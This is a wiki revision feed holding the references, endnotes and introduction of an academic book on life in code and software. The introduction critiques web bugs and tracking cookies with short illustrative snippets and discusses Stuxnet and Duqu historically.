ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lumapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
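&lt;br /&gt;
The mechanism Mittal describes is visible in ordinary HTTP headers. Schematically (all values invented), the server sets the ‘state’ on the first visit and the browser returns it with every subsequent request: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
GET / HTTP/1.1                 (first visit: the browser holds no cookie)
Host: www.example.org

HTTP/1.1 200 OK                (the server registers 'state')
Set-Cookie: uid=a1b2c3; Expires=Wed, 27 Mar 2013 10:00:00 GMT

GET /page2 HTTP/1.1            (every later request returns the cookie)
Host: www.example.org
Cookie: uid=a1b2c3
&amp;lt;/pre&amp;gt;&lt;br /&gt;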
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm can transfer itself without any human action, taking advantage of a computer's file or information transport features - such as its networking setup - to travel unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm, and careful analysis of the internal data structures and the finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; careful analysis of what had accidentally been photographed in the background of these images, including computers in use at the plant, confirmed the importance of the cascade structure, the centrifuge layout and the enriching process (see [http://www.president.ir/en/9172 http://www.president.ir/en/9172]; Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, released in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, however, some criticisms suggesting that this link may be spurious. For instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit'. &lt;br /&gt;
&lt;br /&gt;
[10] Having performed a detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Compactants are computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively suggest that a future critical theory of code and software would be committed to the ''un-building'', ''dis-assembling'' and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4700</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4700"/>
		<updated>2012-04-18T13:48:29Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming part of the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how we live today in a highly mediated, code-based world.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has steadily penetrated more and more of the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms - think, for instance, of the pressure real-time online news places on the print newspaper - as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. Such concerns relate to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project - a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task made all the more difficult both by the staggering rate of change, thanks to underlying hardware technologies that are becoming ever smaller, more compact, more powerful and less power-hungry, and by the increasing complexity, power, range and intelligence of the software that runs on them. &lt;br /&gt;
&lt;br /&gt;
These devices also enable the assembly of new social ontologies, and of the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices - and the computational principles on which they are based and from which they draw their power - have permeated the way we use and develop knowledges in everyday life is remarkable, even if we have already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it had not become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences, disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser, softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is increasingly the condition of the computational environment we experience, and which I have elsewhere termed ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post)modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangles of glass which yield only to certain prescribed forms of interface - here I am thinking of physical keyboards and trackpads as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has observed, is that print is flat and code is deep (though see Frabetti’s contribution to this book for a critical discussion of this formulation).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behaviour and send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring users by recording their browsing, purchasing and clicking behaviour through these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
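&lt;br /&gt;
To make the mechanism concrete, the following is a minimal sketch of how a tracking script might set such a cookie in the browser; the identifier scheme is invented for illustration, and real trackers (particularly third-party ones, which set cookies from their own domains) are considerably more elaborate: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;// Hypothetical sketch: storing a pseudonymous id as cookie 'state' &lt;br /&gt;
// so that the tracker can recognise the same browser on later visits. &lt;br /&gt;
if (document.cookie.indexOf('uid=') === -1) { &lt;br /&gt;
  var uid = Math.random().toString(36).substring(2); // invented identifier &lt;br /&gt;
  document.cookie = 'uid=' + uid + '; expires=Fri, 01 Jan 2016 00:00:00 GMT; path=/'; &lt;br /&gt;
} &lt;br /&gt;
// The browser now returns 'Cookie: uid=...' with every request to the &lt;br /&gt;
// site, allowing separate visits to be linked into one profile.&amp;lt;/pre&amp;gt; &lt;br /&gt;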
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery entry for the [http://chartbeat.com/ ChartBeat company], it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should this code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any)&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
